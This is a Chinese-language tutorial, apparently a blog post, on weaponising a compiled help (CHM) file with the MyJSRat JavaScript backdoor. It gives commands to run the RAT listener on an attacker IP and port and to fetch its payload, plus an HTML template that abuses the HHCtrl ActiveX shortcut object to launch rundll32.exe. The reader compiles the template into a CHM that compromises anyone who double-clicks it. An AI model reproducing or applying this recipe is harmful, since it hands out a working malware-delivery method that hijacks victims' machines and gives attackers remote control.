MyJSRat 结合 CHM 命令执行
MyJSRat
MyJSRat 是 JSBackdoor 的 python 版本
下载地址: https://github.com/Ridter/MyJSRat
Easy CHM
CHM 是英语 Compiled Help Manual 的简写,即「已编译的帮助文件」。CHM 是微软新一代的帮助文件格式,利用 HTML 作源文,把帮助内容以类似数据库的形式编译储存。
步骤
下载 MyJSRat 并运行
git clone https://github.com/Ridter/MyJSRat
python MyJSRat.py -i IPaddr -p port
下载 wtf 文件
浏览器访问 https://IPaddr:port/wtf ,并保存至 txt 文件中
将上面保存的代码写入到如下代码的 Item1 的 Value 值中
注 :要在 rundll32.exe 前后添加 ,
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
保存为 HTML 文件
新建目录,将上述代码保存在新建文件夹中
通过 EasyCHM 制作 CHM 文件
通过 EasyCHM 编译 exp.html 文件
双击上线
此时只要双击 test.CHM 文件,即可上线
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论